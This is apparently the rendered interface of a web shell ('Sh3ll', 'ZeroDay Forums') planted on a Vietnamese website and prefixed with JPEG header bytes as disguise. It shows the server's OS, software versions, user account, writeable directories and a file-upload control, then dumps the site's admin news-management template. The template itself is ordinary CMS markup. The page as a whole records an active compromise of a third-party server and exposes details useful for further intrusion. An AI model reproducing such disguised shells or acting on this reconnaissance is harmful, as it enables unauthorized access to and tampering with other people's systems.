����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/thietkewebvumi.com/admin_new/skin/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/thietkewebvumi.com/admin_new/skin/admin/news.tpl
<h4 class="alert_info"><form action="index.php?act=news" method="post">
    <input type="text" name="fkeyword" value="" />
    <input type="submit" name="submita" value="Tìm tin" />
</form></h4>
{if $status == 'del_success'}
<h4 class="alert_success">Xóa tin thành công</h4>
{/if}
{if $status == 'add_success'}
<h4 class="alert_success">Thêm tin thành công</h4>
{/if}
{if $status == 'edit_success'}
<h4 class="alert_success">Sửa tin thành công</h4>
{/if}
{if $section == 'list'}
<script type="text/javascript">
    function get_mid(type){
        switch(type){
            case 'del':
                if(confirm('Bạn có chắc muốn xóa?')){
                    $('#type').attr('value','del');
                    $('#form1').submit();
                    return false;
                }
            break;
            default:
                $('#type').attr('value',type);
                $('#form1').submit();
                return false;
            break;
        }
    }
</script>
<article class="module width_full">
    <header><h3 class="tabs_involved"><a href="javascript:void(0);" onclick="get_mid('del');">Xóa</a> |
        <a href="javascript:void(0);" onclick="get_mid('active');">Kích hoạt</a> |  <a href="javascript:void(0);" onclick="get_mid('deactive');">Bỏ kích hoạt</a> | <a href="javascript:void(0);" onclick="get_mid('hot');">Nổi bật</a> | <a href="javascript:void(0);" onclick="get_mid('dehot');">Bỏ nổi bật</a> | <a href="index.php?act=news&code=post">Thêm mới</a></h3></header>
    <input type="checkbox" name="all" id="checkall" /> Check all
    <div class="tab_container">

        <form action="index.php" method="post" name="post" id="form1">
            <input type="hidden" name="act" value="news">
            <input type="hidden" id="type" name="type" value="">
        <div id="tab1" class="tab_content">
            <a name="news"></a>
            <table class="tablesorter" cellspacing="0">
                <thead>
                <tr>
                    <th> </th>
                    <th>Tiêu đề</th>
                    <th>Hình</th>
                    <th>Ngày gửi</th>
                    <th>Kích hoạt</th>
                    <th>Nổi bật</th>
                    <th>Actions</th>
                </tr>
                </thead>


                <tbody>
                {if $list}
                    {foreach from=$list key=k item=news}
                <tr>
                    <td><input type="checkbox" value="{$news.id}" name="mid_for_del[]"></td>
                    <td><a href="index.php?act=news&code=post&id={$news.id}" target="_blank">{$news.title}</a></td>
                    <td><a href="index.php?act=news&code=post&id={$news.id}" target="_blank"><img src="../upload/news/{$news.img}" width="30" border="0"></a></td>
                    <td>{$news.time}</td>
                    <td>{if $news.status==1}<img src="skin/{$skin_folder_admin}/images/icn_alert_success.png" title="Đang hoạt động">{else}<img src="skin/{$skin_folder_admin}/images/icn_alert_info.png" title="Chưa kích hoạt">{/if}</td>
                    <td>{if $news.noibat==1}<img src="skin/{$skin_folder_admin}/images/icn_alert_success.png" title="Nổi bật">{else}<img src="skin/{$skin_folder_admin}/images/icn_alert_warning.png" title="Không nổi bật">{/if}</td>
                    <td><a href="index.php?act=news&code=post&id={$news.id}" target="_blank"><img src="skin/{$skin_folder_admin}/images/icn_edit.png" title="Sửa"></a> <a href="index.php?act=news&code=del&id={$news.id}" onclick="return confirm('Bạn có chắc muốn xóa?')"><img src="skin/{$skin_folder_admin}/images/icn_trash.png" title="Xóa"></a> <a href="../index.php?act=news&code=detail&id={$news.id}"><img src="skin/{$skin_folder_admin}/images/icn_search.png" title="Xem trước"></a></td>
                </tr>
                    {/foreach}
                {/if}
                </tbody>

            </table>
            <div class="spacer"></div>
            <div align="center">{$nav|html_entity_decode}</div>
            <div class="spacer"></div>
        </div>
        </form>

    </div><!-- end of .tab_container -->

</article><!-- end of content manager article -->
    {literal}
    <script type="text/javascript">
        $('#checkall:checkbox').change(function () {
            if($(this).attr("checked")) $('input:checkbox').attr('checked','checked');
            else $('input:checkbox').removeAttr('checked');
        });
    </script>
    {/literal}
{/if}


{if $section == 'post'}
<article class="module width_full">
    <header><h3>Quản lý tin tức</h3></header>
 <form name="post" id="post" action="" method="post" enctype="multipart/form-data">
    <div class="module_content">
        <fieldset>
            <label>Tiêu đề</label>
            <input type="text" value="{$post.title|html_entity_decode}" name="title" />
        </fieldset>
        <fieldset>
            <label>Ảnh tin tức</label>
            <input type="file" name="image1" /> <img src="../upload/news/thumb_{$post.img}" width="50" />
        </fieldset>

        <fieldset>
            <label>Category</label>
            <select name="cat[]" id="cat" multiple="multiple" style="width:60%; height: 230px;">
                {foreach from=$list_cat key=k item=listcat}
                <option value="{$listcat.cid}" {$listcat.op}>{$listcat.cname}</option>
                {/foreach}
            </select>
        </fieldset>

        <fieldset>
            <label>Mô tả tin tức</label>
            <textarea rows="12" name="intro">{$post.intro}</textarea>
        </fieldset>

        <div class="module_content">
            <h3>Nội dung chi tiết:</h3>
            <p>{$post.body}</p>
        </div>


        <fieldset style="width:48%; float:left; margin-right: 3%;">
            <label>Tin khuyến mãi ?</label>
            {$post.khuyenmai}
        </fieldset>
        <fieldset style="width:48%; float:left; margin-right: 3%;">
            <label>Kích hoạt ?</label>
            {$post.status}
        </fieldset>
        <fieldset style="width:48%; float:left; margin-right: 3%;">
            <label>Nổi bật ?</label>
            {$post.noibat}
        </fieldset>



    </div>
    <footer>
        <div class="submit_link">
            <input type="hidden" name="id" value="{$post.id}" />
            <input type="submit" name="bsubmit" value=" Lưu " />


        </div>
    </footer>

  </form>
</article><!-- end of post new article -->

{/if}

{if $section == 'post_epi'}
<article class="module width_full">
    <header><h3>Edit/Post tập phim</h3></header>
    <form name="post" action="" method="post" enctype="multipart/form-data">
    <div class="module_content">
        <fieldset>
            <label>eid *</label>
            <input type="text" value="{$post.eid}" name="eid" readonly />
        </fieldset>
        <fieldset>
            <label>mid *</label>
            <input type="text" value="{$post.mid}" name="mid" readonly/>
        </fieldset>
        <fieldset>
            <label>Server</label>
            <input type="text" value="{$post.server}" name="server" />
        </fieldset>

        <fieldset>
            <label>Play</label>
            <textarea name="play">{$post.play}</textarea>
        </fieldset>
        <fieldset>
            <label>Pos</label>
            <input type="text" value="{$post.pos}" name="pos" />
        </fieldset>
        <fieldset>
            <label>Site</label>
            <select name="site">
                <option value="phim19.com" {if $post.site == 'phim19.com'}selected{/if}>phim19.com</option>
                <option value="v1vn.com" {if $post.site == 'v1vn.com'}selected{/if}>v1vn.com</option>
                <option value="phim47.com" {if $post.site == 'phim47.com'}selected{/if}>phim47.com</option>
                <option value="xixam.com" {if $post.site == 'xixam.com'}selected{/if}>xixam.com</option>
                <option value="vkool.net" {if $post.site == 'vkool.net'}selected{/if}>vkool.net</option>
                <option value="oknews.info" {if $post.site == 'oknews.info'}selected{/if}>oknews.info</option>
                <option value="phim4d.com" {if $post.site == 'phim4d.com'}selected{/if}>phim4d.com</option>
                <option value="phim4g.com" {if $post.site == 'phim4g.com'}selected{/if}>phim4g.com</option>
                <option value="phimvang.org" {if $post.site == 'phimvang.org'}selected{/if}>phimvang.org</option>
                <option value="phimf.com" {if $post.site == 'phimf.com'}selected{/if}>phimf.com</option>
                <option value="hayghe.com" {if $post.site == 'hayghe.com'}selected{/if}>hayghe.com</option>
                <option value="phim.clip.vn" {if $post.site == 'phim.clip.vn'}selected{/if}>phim.clip.vn</option>
                <option value="anhtrang.org" {if $post.site == 'anhtrang.org'}selected{/if}>anhtrang.org</option>
                <option value="vuaphim.net" {if $post.site == 'vuaphim.net'}selected{/if}>vuaphim.net</option>
            </select>
        </fieldset>


        <div class="clear"></div>
    </div>
    <footer>
        <div class="submit_link">
            <input type="hidden" name="id" value="{$post.id}" />
            <input type="submit" name="bsubmit" value=" Submit " />
        </div>
    </footer>
    </form>
</article><!-- end of post new article -->
{/if}

ZeroDay Forums Mini